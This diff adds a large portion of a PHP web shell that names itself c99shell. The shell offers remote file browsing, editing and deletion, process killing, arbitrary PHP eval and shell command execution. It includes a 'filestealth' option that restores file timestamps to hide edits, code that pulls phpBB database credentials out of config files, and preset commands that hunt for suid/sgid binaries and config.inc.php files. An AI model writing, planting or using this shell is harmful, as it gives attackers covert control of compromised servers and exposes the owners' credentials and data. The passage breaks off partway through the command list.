+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
